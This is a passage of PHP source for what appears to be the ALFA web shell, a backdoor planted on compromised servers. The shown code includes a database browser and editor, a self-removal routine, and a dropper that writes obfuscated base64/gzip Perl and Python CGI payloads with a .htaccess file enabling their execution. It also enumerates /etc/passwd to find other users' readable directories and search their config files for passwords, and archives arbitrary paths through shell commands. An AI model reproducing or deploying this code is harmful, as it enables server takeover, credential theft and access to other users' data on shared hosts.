 $status = true;
}
echo @json_encode(array("status" => $status, "error" => $error, "query" => $query));
}
}elseif($type == "update"){
$query = "UPDATE `".$db["db"]."`.`".$db["table"]."` SET ";
foreach($db["data"] as $col => $val){
$query .= "`".$col."` = '".mysqli_real_escape_string($conn, $val)."',";
}
$query = substr($query, 0, -1);
$query .= "WHERE `".$db["col_key"]."` = '".$db["key"]."'";
$res = @mysqli_query($conn, $query);
echo @json_encode(array("status" => $res, "error" => @mysqli_error($conn)));
}elseif($type == "insert"){
$query = "INSERT INTO `".$db["db"]."`.`".$db["table"]."` ";
foreach($db["data"] as $col => $val){
$cols .= $col . ",";
$vals .= "'".mysqli_real_escape_string($conn, $val)."',";
}
$cols = substr($cols, 0, -1);
$vals = substr($vals, 0, -1);
$query = $query . "(" . $cols . ")" . "VALUES(" . $vals . ")";
$res = @mysqli_query($conn, $query);
echo @json_encode(array("status" => $res, "error" => @mysqli_error($conn)));
}else{
$pages = 0;
$title = false;
$query = "";
$tbl_content = '<table width="100%" cellspacing="1" cellpadding="2" class="main mysql-data-tbl" style="background-color:#292929">';
$line = 0;
$tables = array();
$columns = array();
if($type == "load_data"){
$query = "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` LIMIT 0,30";
$tbl_count_q = @mysqli_query($conn, "SELECT COUNT(*) FROM `".$db["db"]."`.`".$db["table"]."`");
$tbl_count = @mysqli_fetch_row($tbl_count_q);
$columns_query = @mysqli_query($conn, "SELECT COLUMN_NAME as name, COLUMN_TYPE as type, COLLATION_NAME as collation, DATA_TYPE as data_type, CHARACTER_MAXIMUM_LENGTH as type_value FROM information_schema.columns WHERE `TABLE_SCHEMA` = '".$db["db"]."' AND `TABLE_NAME` = '".$db["table"]."'");
while($row2 = @mysqli_fetch_array($columns_query, MYSQLI_ASSOC)){
$columns[] = $row2;
}
if($tbl_count[0] > 30){
$pages = ceil($tbl_count[0] / 30);
}
}elseif($type == "query"){
$query = $db["query"];
}elseif($type == "page"){
$db["page"] = (int)$db["page"] - 1;
$query = "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` LIMIT ".($db["page"]*30).",30";
}elseif($type == "search"){
$search = "";
$search_noval = array("= ''", "!= ''", "IS NULL", "IS NOT NULL");
foreach($db["search"] as $col => $val){
$search_noval_r = in_array($val["opt"], $search_noval);
if(empty($val["value"]) && !$search_noval_r)continue;
if(strstr($val["opt"], "...") || $search_noval_r){
$val["opt"] = str_replace("...", $val["value"], $val["opt"]);
$search .= $col . " " . $val["opt"] . " AND ";
}else{
$search .= $col . " " . $val["opt"] . " '".addslashes($val["value"])."' AND ";
}
}
$search .= "1=1";
$query = "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` WHERE " . $search;
}
$q_tables = @mysqli_query($conn, $query);
if(!$q_tables){
echo @json_encode(array("status" => false, "error" => @mysqli_error($conn), "query" => $query));
return false;
}
$col_key = @mysqli_query($conn, "SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = '".@addslashes($db["db"])."' AND TABLE_NAME = '".@addslashes($db["table"])."' AND COLUMN_KEY = 'PRI'");
if($col_key){
$col_key = @mysqli_fetch_row($col_key);
$col_key = $col_key[0];
if(!empty($col_key)){
$tbl_content = '<div style="margin-bottom:5px;margin-top:5px;"><button col_key="'.$col_key.'" tbl_name="'.$db["table"].'" db_id="'.$db["db_id"].'" db_target="'.$db["db"].'" onclick="alfaMysqlDeleteAllSelectedrows(this);return false;">Delete Selected Rows</button></div><table width="100%" cellspacing="1" cellpadding="2" class="main mysql-data-tbl" style="background-color:#292929">';
}
}else{
$col_key = false;
}
while($item = @mysqli_fetch_assoc($q_tables)){
if(!$title){
$tbl_content .= '<tr style="background-color:#305b8e;">';
if($col_key){
$tbl_content .= '<th style="width: 55px;text-align:center;"><input db_id="'.$db["db_id"].'" onchange="alfaMysqlTblSelectAll(this);" type="checkbox"></th><th style="width: 55px;text-align:center;">Edit</th><th style="width: 55px;text-align:center;">Delete</th>';
}
foreach($item as $key => $value){
$tbl_content .= '<th>'.$key.'</th>';
}
reset($item);
$title=true;
$tbl_content .= '</tr><tr>';
}

if($col_key){
$cacheMsg = '<td style="text-align:center;"><input row_id="'.$line.'" type="checkbox" name="tbl_rows_checkbox[]" value="'.$item[$col_key].'"></td><td style="text-align:center;"><a class="db-opt-id" href="javascript:void(0);" db_id="'.$db["db_id"].'" db_target="'.$db["db"].'" tbl_name="'.$db["table"].'" col_key="'.$col_key.'" key="'.$item[$col_key].'" onclick="alfaMysqlEditRow(this, \'edit\');" style="color:#0acaa6;">Edit</a></td><td style="text-align:center;"><a class="db-opt-id" href="javascript:void(0);" db_id="'.$db["db_id"].'" db_target="'.$db["db"].'" tbl_name="'.$db["table"].'" col_key="'.$col_key.'" key="'.$item[$col_key].'" row_id="'.$line.'" onclick="alfaMysqlEditRow(this, \'delete\');" style="color:#ff1e1e;">Delete</a></td>';
}
$tbl_content .= '<tr class="tbl_row tbl_row_l'.$line.'">'.$cacheMsg;
$line++;
foreach($item as $key => $value){
if($value == null){
$tbl_content .= '<td><i>null</i></td>';
}else{
$tbl_content .= '<td>'.nl2br(htmlspecialchars($value)).'</td>';
}
}
$tbl_content .= '</tr>';
}
$tbl_content .= '</table>';
if(!$title){
$tbl_content = "<div style='padding:5px;border:1px dashed;margin:10px;'>Table is empty...</div>";
}
echo @json_encode(array("status" => true, "table" => $tbl_content, "columns" => $columns, "pages" => $pages, "query" => $query));
}
@mysqli_close($conn);
}
}
function alfaselfrm(){
if(isset($_POST['alfa1'])&&$_POST['alfa1']=='yes'){
echo(__pre().'<center>');
if(@unlink($GLOBALS['__file_path'])){
echo('<b>Shell has been removed</i> :)</b>');
}else{
echo 'unlink error!';
}
echo('</center>');
}
if(isset($_POST['alfa1'])&&$_POST['alfa1']!='yes'){
echo "<div class=header>";
echo '<p><div class="txtfont">Do you want to destroy me?!</div><a href=javascript:void(0) onclick="g(\'selfrm\',null,\'yes\');"> Yes</a>';
echo '</p></center></div>';
}
}
function alfacgishell(){
alfahead();
$div = "";
alfaCreateParentFolder();
@chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__);
if(!in_array($_POST['alfa1'],array('perl','py'))){
$div = "</div>";
echo '<div class=header><center><p><div class="txtfont_header">| CGI Shell |</div></p><h3><a class="rejectme" href="javascript:void(0)" onclick="runcgi(\'perl\')">| Perl | </a><a class="rejectme" href="javascript:void(0)" onclick="runcgi(\'py\');">| Python | </a>';
}
if(isset($_POST['alfa1'])&&in_array($_POST['alfa1'],array('perl','py'))){
@mkdir('cgialfa',0755);
@chdir('cgialfa');
alfacgihtaccess('cgi');
$name = $_POST['alfa1'].'.alfa';
$perl = '#!/usr/bin/perl   -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("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")));';;
$py = '#!/usr/bin/python'."\nimport zlib, base64\n".'eval(compile(zlib.decompress(base64.b64decode("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")),\'<string>\',\'exec\'))';
if($_POST['alfa1']=='perl'){$code = $perl;}else{$code = $py;}
if(__write_file($name,$code)){
@chmod($name,0755);
echo '<iframe src="'.__ALFA_DATA_FOLDER__.'/cgialfa/'.$name.'" width="100%" height="600px" frameborder="0" style="opacity:0.9;filter: alpha(opacity=9);overflow:auto;"></iframe>';
}
}
echo $div;
alfafooter();
}
function alfacgihtaccess($m,$d='', $symname=false){
$readme = "";
if($symname){$readme="\nReadmeName ".trim($symname);}
if($m=='cgi'){
$code = "#Coded By Sole Sad & Invisible\nOptions FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .alfa\nAddHandler cgi-script .alfa";
}elseif($m=='sym'){
$code = "#Coded By Sole Sad & Invisible\nOptions Indexes FollowSymLinks\nDirectoryIndex solevisible.phtm\nAddType text/plain php html php4 phtml\nAddHandler text/plain php html php4 phtml{$readme}\nOptions all";
}elseif($m=='shtml'){
$code = "Options +Includes\nAddType text/html .shtml\nAddHandler server-parsed .shtml";
}
@__write_file($d . ".htaccess", $code);
}
function alfabasedir(){
alfahead();
echo '<div class=header>
<center><p><div class="txtfont_header">| Open Base Dir |</div></p></center>';
$passwd = _alfa_file('/etc/passwd');
if(is_array($passwd)){
$users = array();
$makepwd = alfaMakePwd();
$basedir = @ini_get('open_basedir');
$safe_mode = @ini_get('safe_mode');
if(_alfa_can_runCommand(true,false)&&($basedir||$safe_mode)){
$bash = "fZBPSwMxEMXPzacYx9jugkvY9lbpTQ9eFU9NWdYk2wYkWZKsgmu+u9NaS8E/cwgDL/N+M+/yQjxbJ+KO3d4/rHjNusGpZL2DmEITTP/SKlOUIwOqNVTvgLxG2MB0CsGkITioz7X5P9riN60hzhHTvLYn5IoXfbAudYBXUUqHX9wPiEZDZQCj4OM807PIYovlwevHxPiHe0aWmVE7f7BaS4Ws8wEsWAe8UEOCSi+h6moQJinRtzG+6fIGtGeTp8c7Cqo4i4dAFB7xxiGakPdgSxtN6OxA/X7gePk3UtIPiddMe2dOe8wQN7NP";
$tmp_path = alfaWriteTocgiapi("basedir.alfa",$bash);
$bash_users  = alfaEx("cd ".$tmp_path."/alfacgiapi;sh basedir.alfa ".$makepwd,false,true,true);
$users = json_decode($bash_users, true);
$x=count($users);
if($x>=2){array_pop($users);--$x;}
}
if(!$basedir&&!$safe_mode){
$x=0;
foreach($passwd as $str){
$pos = strpos($str,':');
$username = substr($str,0,$pos);
$dirz = str_replace("{user}", $username, $makepwd);
if(($username != '')){
if (@is_readable($dirz)){
array_push($users,$username);
$x++;
}}}
}
echo '<br><br>';
echo "<b><font color=\"#00A220\">[+] Founded ".sizeof($passwd)." entrys in /etc/passwd\n"."<br /></font></b>";
echo "<b><font color=\"#FFFFFF\">[+] Founded ".$x." readable ".str_replace("{user}", "*", $makepwd)." directories\n"."<br /></font></b>";
echo "<b><font color=\"#FF0000\">[~] Searching for passwords in config files...\n\n"."<br /><br /><br /></font></b>";
foreach($users as $user){
if(empty($user))continue;
$path = str_replace("{user}", $user, $makepwd);
echo "<form method=post onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span><font color=#27979B>Change Dir <font color=#FFFF01>..:: </font><font color=red><b>$user</b></font><font color=#FFFF01> ::..</font></font></span><br><input class='foottable' type=text name=c value='$path'><input type=submit value='>>'></form><br>";
}
}else{echo('<b> <center><font color="#FFFFFF">[-] Error : coudn`t read /etc/passwd [-]</font></center></b>');}
echo '<br><br></b>';
echo '</div>';
alfafooter();
}
function alfaziper(){
alfahead();
AlfaNum(8,9,10);
echo '<div class=header><p><center><p><div class="txtfont_header">| Compressor |</div></p>
<form onSubmit="g(\'ziper\',null,null,null,this.dirzip.value,this.zipfile.value,\'>>\');return false;" method="post">
<div class="txtfont">Dir/File: </div> <input type="text" name="dirzip" value="'.(!empty($_POST['alfa3'])?htmlspecialchars($_POST['alfa3']):htmlspecialchars($GLOBALS['cwd'])).'" size="60"/>
<div class="txtfont">Save Dir: </div> <input type="text" name="zipfile" value="'.$GLOBALS['cwd'].'alfa.zip" size="60"/>
<input type="submit" value=" " name="ziper" />
</form></center></p>';
if(isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>')){
$dirzip = $_POST['alfa3'];
$zipfile = $_POST['alfa4'];
if($GLOBALS['sys']!='unix'&&_alfa_can_runCommand(true,true)){
alfaEx("powershell Compress-Archive -Path '".addslashes($dirzip)."' -DestinationPath '".addslashes(basename($zipfile))."'");
echo __pre().'<center><p>Done -> <b><font color="green">'.$zipfile.'</font></b></p></center>';
}elseif($GLOBALS['sys']=='unix'&&_alfa_can_runCommand(true,true)){
alfaEx("cd '".addslashes(dirname($zipfile))."';zip -r '".addslashes(basename($zipfile))."' '".addslashes($dirzip)."'");
echo __pre().'<center><p>Done -> <b><font color="green">'.$zipfile.'</font></b></p></center>';
}elseif(class_exists('ZipArchive')){
if(__alfaziper($dirzip, $zipfile)){
echo __pre().'<center><p><font color="green">Success...!<br>'.$zipfile.'</font></p></center>';
}else{echo __pre().'<center><p><font color="red">ERROR!!!...</font></p></center>';}
}
}
echo '</div>';
alfafooter();
}
function __alfaziper($source,$destination){
if(!extension_loaded('zip')||!file_exists($source)){
return false;
}
$zip=new ZipArchive();
if(!$zip->open($destination,ZIPARCHIVE::CREATE)){
return false;
}
$source=str_replace('\\','/',realpath($source));
if(is_dir($source)===true){
$files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source),RecursiveIteratorIterator::SELF_FIRST);
foreach($files as $file){
$file=str_replace('\\','/',$file);
if(in_array(substr($file,strrpos($file,'/')+1),array('.','..')))continue;
$file=realpath($file);
if(is_dir($file)===true){
$zip->addEmptyDir(str_replace($source.'/','',$file.'/'));
}else if(is_file($file)===true){
$zip->addFromString(str_replace($source.'/','',$file),file_get_contents($file));
}
}
}else if(is_file($source)===true){
$zip->addFromString(basename($source),file_get_contents($source));
}
return $zip->close();
}
function alfadeziper(){
alfahead();
AlfaNum(8,9,10);
echo '<div class=header><p><center><p><div class="txtfont_header">| DeCompressor |</div></p>
<form onSubmit="g(\'deziper\',null,null,null,this.dirzip.value,this.zipfile.value,\'>>\');return false;" method="post">
<div class="txtfont">File: </div> <input type="text" name="dirzip" value="'.(!empty($_POST['alfa3'])?htmlspecialchars($_POST['alfa3']):htmlspecialchars($GLOBALS['cwd'])).'" size="60"/>
<div class="txtfont">Extract To: </div> <input type="text" name="zipfile" value="'.$GLOBALS['cwd'].'" size="60"/>
<input type="submit" value=" " name="ziper" />
</form></center></p>';
if(isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>')){
$dirzip = $_POST['alfa3'];
$zipfile = $_POST['alfa4'];
if(@!is_dir($zipfile)){
@mkdir($zipfile, 0777, true);
}
$finfo = "";
$file_type = "";
if(function_exists('finfo_open')){
$finfo = @finfo_open(FILEINFO_MIME_TYPE);
$file_type = @finfo_file($finfo, $dirzip);
@finfo_close($finfo);
}else{
if($GLOBALS['sys']=='unix'&&_alfa_can_runCommand(true,true)){
$file_type = alfaEx('file -b --mime-type ' . $dirzip);
}
}
if($GLOBALS['sys']!='unix'&&_alfa_can_runCommand(true,true)){
alfaEx("powershell expand-archive -path '".addslashes($dirzip)."' -destinationpath '".addslashes(basename($zipfile))."'");
echo __pre().'<center><p>Done -> <b><font color="green">'.$zipfile.'</font></b></p></center>';
}elseif($GLOBALS['sys']=='unix'&&!empty($file_type)&&_alfa_can_runCommand(true,true)&&(strlen(alfaEx('which unzip')) > 0||strlen(alfaEx('which tar')) > 0||strlen(alfaEx('which gunzip')) > 0)){
switch ($file_type) {
case 'application/zip':
alfaEx("cd '".addslashes($zipfile)."';unzip '".addslashes($dirzip)."'");
break;
case 'application/x-tar': case 'application/x-gzip': case 'application/x-gtar':
if(strstr(basename($dirzip), ".tar.gz")||strstr(basename($dirzip), ".tar")){
alfaEx("cd '".addslashes($zipfile)."';tar xzf '".addslashes($dirzip)."'");
}else{
alfaEx("cd '".addslashes($zipfile)."';gunzip '".addslashes($dirzip)."'");
}
break;
}
echo __pre().'<center><p>Done -> <b><font color="green">'.$zipfile.'</font> <a style="cursor:pointer;" onclick="g(\'FilesMan\',\''.$zipfile.'\');">[ View Folder ]</a></b></p></center>';
}elseif(class_exists('ZipArchive')){
$itsok = false;
if(emtpy($file_type)){
$file_type = "application/zip";
}
switch ($file_type) {
case 'application/zip':
$zip = new ZipArchive;
$res = $zip->open($dirzip);
if ($res) {
$zip->extractTo($zipfile);
$zip->close();
$itsok = true;
}
break;
case 'application/x-tar': case 'application/x-gzip': case 'application/x-gtar':
if(strstr(basename($dirzip), ".tar.gz")){
$new_file = $zipfile .'/'. basename($dirzip);
@copy($dirzip, $new_file);
$new_tar = str_replace(".tar.gz", ".tar", $new_file);
try {
$p = new PharData($new_file);
$p->decompress();
$phar = new PharData($new_tar);
$phar->extractTo($zipfile);
@unlink($new_file);
@unlink($new_tar);
$itsok = true;
} catch (Exception $e) {
}
}else{
try {
$phar = new PharData($dirzip);
$phar->extractTo($zipfile);
$itsok = true;
} catch (Exception $e) {
}
}
break;
}
if($itsok){
echo __pre().'<center><p><font color="green">Success...!<br>'.$zipfile.'</font> <a style="cursor:pointer;" onclick="g(\'FilesMan\',\''.$zipfile.'\');">[ View Folder ]</a></p></center>';
}else{echo __pre().'<center><p><font color="red">ERROR!!!...</font></p></center>';}
}
}
echo '</div>';
alfafooter();
}
function alfaarchive_manager(){
alfahead();
$file = $_POST['alfa2'];
if(!file_exists($file)){
$file = $GLOBALS['cwd'];
}
$rand_id = rand(9999, 999999);
echo '<div class=header><center><p><div class="txtfont_header">| Archive Manager |</div></p>';
echo '<form name="srch" onSubmit="g(\'archive_manager\',null,null,this.file.value,null,null,\'>>\');return false;" method=\'post\'>
<div class="txtfont">
Archive file: <input size="50" id="target" type="text" name="file" value="'.$file.'">
<input type="submit" name="btn" value=" "></div></form></center><br>';
if($_POST['alfa5']=='>>'){
//echo __pre();
echo '<hr><div style="margin-left: 12px;" archive_full="phar://'.$file.'" archive_name="'.basename($file).'" id="archive_dir_'.$rand_id.'" class="archive_dir_holder"><span>PWD: </span><div class="archive_pwd_holder" style="display:inline-block"><a>/</a></div></div>';
echo '<div style="padding: 10px;" id="archive_base_'.$rand_id.'">';
__alfa_open_archive_file($file, $rand_id);
echo '</div>';
}
echo '</div>';
alfafooter();
}
function __alfa_open_archive_file($arch, $base_id=0){
try{
$files = array();
$dirs = array();
$archive = new PharData($arch);
 foreach($archive as $file) {
 $file_modify = @date('Y-m-d H:i:s', @filemtime($file->getPathname()));
 if($file->isDir()) {
